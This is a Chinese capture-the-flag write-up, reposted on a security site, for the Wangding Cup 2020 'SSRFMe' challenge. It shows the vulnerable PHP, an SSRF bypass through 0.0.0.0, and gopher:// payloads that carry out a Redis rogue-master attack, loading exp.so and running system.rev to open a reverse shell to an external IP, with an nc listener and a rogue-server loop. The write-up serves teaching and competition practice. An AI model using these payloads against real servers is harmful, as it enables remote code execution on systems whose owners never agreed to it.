[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

admin 2022年5月16日19:26:29CTF专场评论10 views2537字阅读8分27秒阅读模式

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

在BUU做的复现

<?phpfunction check_inner_ip($url){    $match_result=preg_match('/^(http|https|gopher|dict)?://.*(/)?.*$/',$url);    if (!$match_result)    {        die('url fomat error');    }    try    {        $url_parse=parse_url($url);    }    catch(Exception $e)    {        die('url fomat error');        return false;    }    $hostname=$url_parse['host'];    $ip=gethostbyname($hostname);    $int_ip=ip2long($ip);    return ip2long('127.0.0 n.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16;}function safe_request_url($url){    if (check_inner_ip($url))    {        echo $url.' is inner ip';    }    else    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        curl_setopt($ch, CURLOPT_HEADER, 0);        $output = curl_exec($ch);        $result_info = curl_getinfo($ch);        if ($result_info['redirect_url'])        {            safe_request_url($result_info['redirect_url']);        }        curl_close($ch);        var_dump($output);    }}if(isset($_GET['url'])){    $url = $_GET['url'];    if(!empty($url)){        safe_request_url($url);    }}else{    highlight_file(__FILE__);}// Please visit hint.php locally.?>

https://blog.csdn.net/qq_39293438/article/details/84899550

这里面关于 curl 的利用提到了,当处理这个地址时

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

curl 和 php_url_parse 处理后最终的目标不一样

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

当 php_url_parse 认为 google.com 为目标的同时,curl 认为 evil.com:80 是目标。

也可以使用 DNS 重绑定(DNS rebinding)浅谈DNS重绑定漏洞

我用的是

?url=http://0.0.0.0/hint.php //0.0.0.0

代表本机 ipv4 的所有地址

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

得到redis psss

用主从复制打 目录为有权限的/tmp

主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中,但是如果硬盘的数据被删除的话数据就无法恢复了,如果通过主从复制就能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据是就会通过主从复制复制到其它从redis。

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

gopher://0.0.0.0:6379/_auth rootconfig set dir /tmp/quit//这里要二次url编码gopher://0.0.0.0:6379/_auth%2520root%250aconfig%2520set%2520dir%2520%252ftmp%252f%250aquitgopher://0.0.0.0:6379/_auth rootconfig set dbfilename exp.soslaveof 174.1.160.222 6666quitgopher://0.0.0.0:6379/_auth rootmodule load /tmp/exp.sosystem.rev 174.1.160.222 6663quit

用rogue-server.py架起rogue 服务器,另外再监听6663端口。也就是说6666端口监听用来主从复制传输exp.so ,6663端口接收反弹shell。

rogue-server.py 来自

https://github.com/xmsec/redis-ssrf

(用这里的ssrf-redis.py是可以直接生成执行命令的payload,但buu的这我cat /flag一直打不出flag,whoami,pwd是有结果回显,很奇怪不知道啥原因)

exp.so 来自

https://github.com/n0b0dyCN/redis-rogue-server


redis连接过后就这样,记得写个死循环跑rogue-server.py 不然一连上就自动断开连接。可能导致exp.so都没传完就中断了。

while [ "1" = "1" ]dopython rogue-server.pydone

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

再开个窗口nc -lvvp 6663监听就行

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解


[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解


原文来自CSDN博主「Arnoldqqq」|侵删




[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解


中电运行是专业专注培养能源企业IT工匠和提供IT整体解决方案的服务商,也是能源互联网安全专家。

为方便大家沟通,中电运行开通“中电运行交流群”,诚挚欢迎能源企业和相关人士,以及对网络安全感兴趣的群体加入本群,真诚交流,互相学习[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解。想加入我们就给我们留言吧[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

小白必读!寰宇卫士手把手教你栈溢出(上)

手把手教你栈溢出(中)

手把手教你栈溢出(下)

《信息安全知识》之法律关键常识汇总

CTF经验分享|带你入门带你飞!

[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解


原文始发于微信公众号(寰宇卫士):[网鼎杯 2020 玄武组]SSRFMe-解题步骤详解

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月16日19:26:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  [网鼎杯 2020 玄武组]SSRFMe-解题步骤详解 http://cn-sec.com/archives/1011181.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: